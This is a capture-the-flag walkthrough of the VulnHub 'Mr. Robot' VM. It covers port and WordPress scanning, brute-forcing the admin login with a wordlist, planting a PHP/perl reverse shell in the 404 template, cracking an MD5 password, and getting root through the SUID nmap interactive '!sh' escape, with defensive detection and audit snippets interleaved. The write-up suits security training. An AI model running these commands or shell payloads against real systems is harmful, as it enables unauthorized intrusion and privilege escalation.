vulnhub----Mr.root

Target VM download: https://download.vulnhub.com/mrrobot/mrRobot.ova.torrent

This target machine is called Mr.root

kali: 192.168.100.8

Win7: 192.168.100.9

==================================================================================================

Information gathering

First, scan for the target's IP address:

 nmap -sP 192.168.100.0/24

The target's IP address turns out to be 192.168.100.13

Then run nmap -p 1-65535 192.168.100.13 to scan every port on the target

We start with port 80

The web page plays an animation of a Linux boot and login sequence, and at the end it offers a few commands

Let's look at its robots.txt

http://192.168.100.13/robots.txt

Opening fsocity.dic, it looks like a brute-force wordlist

Download it and save a deduplicated copy

wget http://192.168.100.13/fsocity.dic

cat fsocity.dic | sort | uniq > fsocity_sorted.dic

Next open key-1-of-3.txt

It contains:

073403c8a58a1f80d943455fb30724b9

Running this through MD5 lookup services gives no result

Then we scan the target for vulnerabilities with nikto

nikto -h 192.168.100.13

root@kali:~# nikto -h 192.168.100.13
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.100.13
+ Target Hostname:    192.168.100.13
+ Target Port:        80
+ Start Time:         2018-12-02 15:10:03 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad 
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ Uncommon header 'link' found, with contents: ; rel=shortlink
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found
+ /blog/wp-login.php: Wordpress login found
+ /wp-login.php: Wordpress login found
+ 7535 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time:           2018-12-02 15:12:36 (GMT8) (153 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The output includes a lot of WordPress information

Similarly you can use nmap to enumerate paths

nmap -Pn -n -p80 --script http-enum 192.168.100.13

root@kali:~# nmap -Pn -n -p80 --script http-enum 192.168.100.13
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-02 15:40 CST
Nmap scan report for 192.168.100.13
Host is up (0.00029s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-enum: 
|   /admin/: Possible admin folder
|   /admin/index.html: Possible admin folder
|   /wp-login.php: Possible admin folder
|   /robots.txt: Robots file
|   /readme.html: Wordpress version: 2 
|   /feed/: Wordpress version: 4.3.17
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|   /readme.html: Interesting, a readme.
|   /0/: Potentially interesting folder
|_  /image/: Potentially interesting folder
MAC Address: 08:00:27:26:9E:38 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 38.05 seconds
 

So let's use wpscan to see whether it finds more useful information

wpscan --url 192.168.100.13 -e vp

root@kali:~# wpscan --url 192.168.100.13 -e vp
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.9.4
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.100.13/
[+] Started: Sun Dec  2 15:18:48 2018

[+] Interesting header: SERVER: Apache
[+] Interesting header: X-FRAME-OPTIONS: SAMEORIGIN
[+] Interesting header: X-MOD-PAGESPEED: 1.9.32.3-4523
[+] robots.txt available under: http://192.168.100.13/robots.txt   [HTTP 200]
[+] XML-RPC Interface available under: http://192.168.100.13/xmlrpc.php   [HTTP 405]

[+] Enumerating WordPress version ...
[!] The WordPress 'http://192.168.100.13/readme.html' file exists exposing a version number

[+] WordPress version 4.3.17 (Released on 2018-07-05) identified from links opml

[+] Enumerating installed plugins (only ones with known vulnerabilities) ...

   Time: 00:00:38 <====================================================================================================> (1671 / 1671) 100.00% Time: 00:00:38

[+] We found 8 plugins:

[+] Name: akismet
 |  Latest version: 4.1 
 |  Last updated: 2018-11-12T19:38:00.000Z
 |  Location: http://192.168.100.13/wp-content/plugins/akismet/

[!] We could not determine the version installed. All of the past known vulnerabilities will be output to allow you to do your own manual investigation.

[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8215
    Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
    Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
[i] Fixed in: 3.1.5

[+] Name: all-in-one-seo-pack - v2.0.4
 |  Last updated: 2018-10-24T22:24:00.000Z
 |  Location: http://192.168.100.13/wp-content/plugins/all-in-one-seo-pack/
 |  Readme: http://192.168.100.13/wp-content/plugins/all-in-one-seo-pack/readme.txt
[!] The version is out of date, the latest version is 2.9.1

[!] Title: All in One SEO Pack <= 2.1.5 - aioseop_functions.php new_meta Parameter XSS
    Reference: https://wpvulndb.com/vulnerabilities/6888
    Reference: http://blog.sucuri.net/2014/05/vulnerability-found-in-the-all-in-one-seo-pack-wordpress-plugin.html
[i] Fixed in: 2.1.6

[!] Title: All in One SEO Pack <= 2.1.5 - Unspecified Privilege Escalation
    Reference: https://wpvulndb.com/vulnerabilities/6889
    Reference: http://blog.sucuri.net/2014/05/vulnerability-found-in-the-all-in-one-seo-pack-wordpress-plugin.html
[i] Fixed in: 2.1.6

[!] Title: All in One SEO Pack <= 2.2.5.1 - Information Disclosure
    Reference: https://wpvulndb.com/vulnerabilities/7881
    Reference: http://jvn.jp/en/jp/JVN75615300/index.html
    Reference: http://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0902
[i] Fixed in: 2.2.6

[!] Title: All in One SEO Pack <= 2.2.6.1 - Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/7916
    Reference: https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html
[i] Fixed in: 2.2.6.2

[!] Title: All in One SEO Pack <= 2.3.6.1 - Unauthenticated Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8538
    Reference: http://seclists.org/fulldisclosure/2016/Jul/23
    Reference: https://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/
    Reference: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_all_in_one_seo_pack_wordpress_plugin.html
    Reference: https://wptavern.com/all-in-one-seo-2-3-7-patches-persistent-xss-vulnerability
    Reference: https://www.wordfence.com/blog/2016/07/xss-vulnerability-all-in-one-seo-pack-plugin/
[i] Fixed in: 2.3.7

[!] Title: All in One SEO Pack <= 2.3.7 -  Unauthenticated Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8558
    Reference: https://www.wordfence.com/blog/2016/07/new-xss-vulnerability-all-in-one-seo-pack/
    Reference: https://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/
[i] Fixed in: 2.3.8

[+] Name: all-in-one-wp-migration - v2.0.4
 |  Last updated: 2018-11-22T10:17:00.000Z
 |  Location: http://192.168.100.13/wp-content/plugins/all-in-one-wp-migration/
 |  Readme: http://192.168.100.13/wp-content/plugins/all-in-one-wp-migration/readme.txt
[!] The version is out of date, the latest version is 6.80

[!] Title: All-in-One WP Migration <= 2.0.4 - Unauthenticated Database Export
    Reference: https://wpvulndb.com/vulnerabilities/7857
    Reference: http://www.pritect.net/blog/all-in-one-wp-migration-2-0-4-security-vulnerability
    Reference: https://www.rapid7.com/db/modules/auxiliary/gather/wp_all_in_one_migration_export
[i] Fixed in: 2.0.5

[!] Title: All-in-One WP Migration <= 6.45 - Reflected Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8851
    Reference: https://wordpress.org/plugins/all-in-one-wp-migration/#developers
[i] Fixed in: 6.46

[+] Name: contact-form-7 - v4.1
 |  Last updated: 2018-10-29T23:58:00.000Z
 |  Location: http://192.168.100.13/wp-content/plugins/contact-form-7/
 |  Readme: http://192.168.100.13/wp-content/plugins/contact-form-7/readme.txt
[!] The version is out of date, the latest version is 5.0.5

[!] Title: Contact Form 7 <= 5.0.3 - register_post_type() Privilege Escalation
    Reference: https://wpvulndb.com/vulnerabilities/9127
    Reference: https://contactform7.com/2018/09/04/contact-form-7-504/
    Reference: https://plugins.trac.wordpress.org/changeset/1935726/contact-form-7
    Reference: https://plugins.trac.wordpress.org/changeset/1934594/contact-form-7
    Reference: https://plugins.trac.wordpress.org/changeset/1934343/contact-form-7
    Reference: https://plugins.trac.wordpress.org/changeset/1934327/contact-form-7
[i] Fixed in: 5.0.4

[+] Name: google-analytics-for-wordpress - v5.3.2
 |  Last updated: 2018-11-27T18:47:00.000Z
 |  Location: http://192.168.100.13/wp-content/plugins/google-analytics-for-wordpress/
 |  Readme: http://192.168.100.13/wp-content/plugins/google-analytics-for-wordpress/readme.txt
[!] The version is out of date, the latest version is 7.3.2

[!] Title: Google Analytics by Yoast <= 5.3.2 - Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/7838
    Reference: http://packetstormsecurity.com/files/130716/
[i] Fixed in: 5.3.3

[!] Title: Google Analytics by Yoast <= 5.3.2 - Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/7856
    Reference: https://yoast.com/ga-plugin-security-update-more/
    Reference: http://klikki.fi/adv/yoast_analytics.html
    Reference: http://packetstormsecurity.com/files/130935/
[i] Fixed in: 5.3.3

[!] Title: Google Analytics by Yoast <= 5.3.3 - Unauthenticated Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/7914
    Reference: https://yoast.com/coordinated-security-release/
    Reference: https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html
    Reference: http://klikki.fi/adv/yoast_analytics2.html
[i] Fixed in: 5.4

[!] Title: Google Analytics by Yoast <= 5.4.4 - Authenticated Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8147
    Reference: https://security.dxw.com/advisories/xss-in-google-analytics-by-yoast-premium-by-privileged-users/
[i] Fixed in: 5.4.5

[+] Name: google-sitemap-generator - v4.0.7.1
 |  Last updated: 2018-04-25T15:06:00.000Z
 |  Location: http://192.168.100.13/wp-content/plugins/google-sitemap-generator/
 |  Readme: http://192.168.100.13/wp-content/plugins/google-sitemap-generator/readme.txt
[!] The version is out of date, the latest version is 4.0.9

[!] Title: Google XML Sitemaps <= 4.0.8 - Authenticated Reflected XSS (via HOST header)
    Reference: https://wpvulndb.com/vulnerabilities/8762
    Reference: https://plugins.trac.wordpress.org/browser/google-sitemap-generator/trunk/sitemap-ui.php#L1310
[i] Fixed in: 4.0.9

[+] Name: jetpack - v3.3.2
 |  Last updated: 2018-11-27T11:01:00.000Z
 |  Location: http://192.168.100.13/wp-content/plugins/jetpack/
 |  Readme: http://192.168.100.13/wp-content/plugins/jetpack/readme.txt
[!] The version is out of date, the latest version is 6.8

[!] Title: Jetpack 3.0-3.4.2 - Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/7915
    Reference: https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html
    Reference: https://jetpack.me/2015/04/20/jetpack-3-4-3-coordinated-security-update/
[i] Fixed in: 3.4.3

[!] Title: Jetpack <= 3.5.2 - Unauthenticated DOM Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/7964
    Reference: https://blog.sucuri.net/2015/05/jetpack-and-twentyfifteen-vulnerable-to-dom-based-xss-millions-of-wordpress-websites-affected-millions-of-wordpress-websites-affected.html
[i] Fixed in: 3.5.3

[!] Title: Jetpack <= 3.7.0 - Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8201
    Reference: https://jetpack.me/2015/09/30/jetpack-3-7-1-and-3-7-2-security-and-maintenance-releases/
    Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-jetpack.html
[i] Fixed in: 3.7.1

[!] Title: Jetpack <= 3.7.0 - Information Disclosure
    Reference: https://wpvulndb.com/vulnerabilities/8202
    Reference: https://jetpack.me/2015/09/30/jetpack-3-7-1-and-3-7-2-security-and-maintenance-releases/
[i] Fixed in: 3.7.1

[!] Title: Jetpack <= 3.9.1 - LaTeX HTML Element XSS
    Reference: https://wpvulndb.com/vulnerabilities/8472
    Reference: https://jetpack.com/2016/02/25/jetpack-3-9-2-maintenance-and-security-release/
    Reference: https://github.com/Automattic/jetpack/commit/dbc33b9105c4dbb0de81544e682a8b6d5ab7e446
[i] Fixed in: 3.9.2

[!] Title: Jetpack 2.0-4.0.2 - Shortcode Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8500
    Reference: https://jetpack.com/2016/05/27/jetpack-4-0-3-critical-security-update/
    Reference: http://wptavern.com/jetpack-4-0-3-patches-a-critical-xss-vulnerability
    Reference: https://blog.sucuri.net/2016/05/security-advisory-stored-xss-jetpack-2.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10706
[i] Fixed in: 4.0.3

[!] Title: Jetpack <= 4.0.3 - Multiple Vulnerabilities
    Reference: https://wpvulndb.com/vulnerabilities/8517
    Reference: https://jetpack.com/2016/06/20/jetpack-4-0-4-bug-fixes/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10705
[i] Fixed in: 4.0.4

[+] Name: wptouch - v3.7.3
 |  Last updated: 2018-11-21T19:54:00.000Z
 |  Location: http://192.168.100.13/wp-content/plugins/wptouch/
 |  Readme: http://192.168.100.13/wp-content/plugins/wptouch/readme.txt
[!] The version is out of date, the latest version is 4.3.34

[!] Title: WPtouch Mobile Plugin <= 3.7.5.3 - Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/7920
    Reference: https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html
[i] Fixed in: 3.7.6

[+] Finished: Sun Dec  2 15:19:36 2018
[+] Elapsed time: 00:00:47
[+] Requests made: 2110
[+] Memory used: 135.586 MB
 

This enumerates the vulnerable plugins in the target's WordPress, but in the end exploiting them failed

Let's visit /wp-admin

Try the default credentials admin/admin

Login error.

Here I use Burp to brute-force the username, with the fsocity_sorted.dic wordlist we prepared earlier

Capture the login POST request, then brute-force the username field, with any value for the password.

The results point to the username elliot

We try logging in with elliot as the username

The error message for this account is different, which shows that elliot is a valid username

Then we set the username to elliot and brute-force the password with the same wordlist

This gets us into the dashboard

You can also do the brute-force with wpscan

wpscan --url http://192.168.100.13 --wordlist=/root/fsocity_sorted.dic --username elliot --threads 20
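The Burp and wpscan runs above hammer wp-login.php with the same wordlist, and that is exactly what a defender sees in the Apache access log. As an added example (not from the original post), this Python detector counts failed login POSTs per source IP in a sliding window over constructed log lines; the threshold, window size and sample addresses are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample lines in Apache combined format (not from the original page):
# 192.0.2.10 fires six login POSTs in 30 seconds; 198.51.100.7 is a normal user.
SAMPLE_LOG = """\
192.0.2.10 - - [02/Dec/2018:15:20:01 +0800] "POST /wp-login.php HTTP/1.1" 200 3412 "-" "Mozilla/5.0"
198.51.100.7 - - [02/Dec/2018:15:20:03 +0800] "GET /robots.txt HTTP/1.1" 200 41 "-" "Mozilla/5.0"
192.0.2.10 - - [02/Dec/2018:15:20:05 +0800] "POST /wp-login.php HTTP/1.1" 200 3412 "-" "Mozilla/5.0"
192.0.2.10 - - [02/Dec/2018:15:20:09 +0800] "POST /wp-login.php HTTP/1.1" 200 3412 "-" "Mozilla/5.0"
192.0.2.10 - - [02/Dec/2018:15:20:14 +0800] "POST /wp-login.php HTTP/1.1" 200 3412 "-" "Mozilla/5.0"
198.51.100.7 - - [02/Dec/2018:15:20:20 +0800] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.10 - - [02/Dec/2018:15:20:22 +0800] "POST /wp-login.php HTTP/1.1" 200 3412 "-" "Mozilla/5.0"
192.0.2.10 - - [02/Dec/2018:15:20:31 +0800] "POST /wp-login.php HTTP/1.1" 200 3412 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)

def parse_line(line):
    """Return (ip, datetime, method, path, status) or None for an unparseable line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))

def detect_login_bruteforce(log_text, threshold=5, window_seconds=60):
    """Flag IPs that POST to wp-login.php at least `threshold` times within any
    `window_seconds` span. A failed WordPress login answers 200 with the form again,
    a success answers 302, so only 200 responses are counted as failed attempts."""
    recent = defaultdict(deque)   # ip -> timestamps of recent failed attempts
    peak = {}                     # ip -> highest in-window count seen
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, status = rec
        if method != "POST" or not path.startswith("/wp-login.php") or status != 200:
            continue
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold:
            peak[ip] = max(peak.get(ip, 0), len(q))
    return sorted(peak.items())

if __name__ == "__main__":
    for ip, count in detect_login_bruteforce(SAMPLE_LOG):
        print(f"ALERT: {ip} made {count} failed wp-login.php POSTs within 60s")
```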

 

After logging into the dashboard, open the 404 page template for editing

Use a PHP reverse shell

'perl','c'=>'c'); 
$back_connect="<base64-encoded perl back-connect script, omitted here>"; 
cf('/tmp/.bc',$back_connect); 
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &"); 
?> 

Then start an nc listener on Kali

After updating the 404 page, browse to any non-existent page on the blog to trigger the reverse-shell code

Then run ls to see what files are there

Nothing useful there; let's look at the home directory

There is the second key here, but we don't have permission to read it; only robot can

Below it there is an md5 file that we can read

So let's go and crack that hash

Result: abcdefghijklmnopqrstuvwxyz

Now we can switch to that user (robot) and read the file

But entering the password requires a tty; there are many ways to get one, and here I use the python method

We get key 2

822c73956184f694993bede3eb39f959
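The md5 file above fell in seconds because it stored an unsalted MD5 of a dictionary word. As an added example (not from the original post), the following Python contrasts that audit check with salted PBKDF2 storage; the wordlist and the RFC 1321 alphabet test vector used as the hash are constructed inputs, and the iteration count is an assumption.

```python
import hashlib
import hmac
import os

# Constructed example values: the md5 file on the target held the hash of the
# lowercase alphabet (also the RFC 1321 test vector), which any lookup recovers instantly.
MD5_FROM_TARGET = "c3fcd3d76192e4007dfb496cca67e13b"   # md5("abcdefghijklmnopqrstuvwxyz")
SAMPLE_WORDLIST = ["password", "elliot", "fsociety", "abcdefghijklmnopqrstuvwxyz", "mrrobot"]

def dictionary_match_md5(hexdigest, words):
    """Return the word whose unsalted MD5 equals hexdigest, or None.
    This is the audit check: if it returns a word, the stored hash protects
    nothing more than the plaintext would."""
    target = hexdigest.lower()
    for w in words:
        if hashlib.md5(w.encode()).hexdigest() == target:
            return w
    return None

# Hardened storage: per-password random salt plus an iterated KDF (PBKDF2-HMAC-SHA256).
ITERATIONS = 200_000

def hash_password(password, salt=None):
    """Return 'pbkdf2_sha256$iterations$salt_hex$hash_hex' for storage."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"

def verify_password(password, stored):
    """Recompute the KDF with the stored salt and compare in constant time."""
    algo, iters, salt_hex, hash_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), hash_hex)

if __name__ == "__main__":
    print("md5 dictionary hit:", dictionary_match_md5(MD5_FROM_TARGET, SAMPLE_WORDLIST))
    stored = hash_password("abcdefghijklmnopqrstuvwxyz")
    print("pbkdf2 verify ok:", verify_password("abcdefghijklmnopqrstuvwxyz", stored))
```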

 

Next comes privilege escalation

Check the target's kernel information

With this information I went to https://www.exploit-db.com/ and looked for privilege escalation exploits I could use. I tried the OFS [CVE-2015-1328] and recvmsg [CVE-2014-0038] exploits, but neither got root.

Let's try another way to escalate privileges

Find all SUID files on the system

There is an nmap among them, which immediately brings to mind the classic nmap trick

Older versions of Nmap (2.02 to 5.21) have an interactive mode that lets the user execute shell commands. Since nmap is among the binaries that execute with root privileges, the interactive console can be used to run a shell with those same privileges.

Check the nmap version

Enter Nmap interactive mode

nmap --interactive

The following command gives an elevated shell.

!sh
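The SUID nmap found above is also the check a defender should automate. Added example, not from the original post: a Python audit that lists setuid files under a tree, compares them against an assumed baseline of setuid binaries normally present on a Debian-style host, and flags an nmap whose version banner falls in the 2.02 to 5.21 interactive-mode range. The EXPECTED_SUID baseline is an assumption to adapt per host.

```python
import os
import re
import stat

# Binaries commonly expected to carry the setuid bit on a Debian/Ubuntu host.
# Constructed baseline for illustration; tune it to your own build.
EXPECTED_SUID = {"su", "sudo", "passwd", "chsh", "chfn", "gpasswd", "newgrp", "mount", "umount", "ping"}

def find_suid(root):
    """Walk `root` and return paths of regular files with the setuid bit set
    (the python equivalent of `find / -perm -4000 -type f`)."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)

def unexpected_suid(paths, baseline=EXPECTED_SUID):
    """Return the setuid files whose basename is not in the baseline set."""
    return [p for p in paths if os.path.basename(p) not in baseline]

NMAP_VERSION_RE = re.compile(r"Nmap version (\d+)\.(\d+)")

def nmap_has_interactive_mode(version_banner):
    """True if the `nmap --version` banner is a release in the 2.02 to 5.21 range,
    the versions that shipped `--interactive` and its `!sh` escape."""
    m = NMAP_VERSION_RE.search(version_banner)
    if not m:
        return False
    ver = (int(m.group(1)), int(m.group(2)))
    return (2, 2) <= ver <= (5, 21)

def audit(root="/"):
    """Report unexpected setuid binaries; a setuid nmap is called out explicitly."""
    findings = unexpected_suid(find_suid(root))
    for p in findings:
        note = "  <-- drop the setuid bit (chmod u-s) or remove the binary" if os.path.basename(p) == "nmap" else ""
        print(f"unexpected setuid: {p}{note}")
    return findings

if __name__ == "__main__":
    audit("/usr")
```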

Now that I have root access, I re-ran the command I used earlier to find every file matching the key file naming pattern (find / -name 'key-*-of-3.txt' 2>/dev/null)

find / -name 'key-*-of-3.txt' 2>/dev/null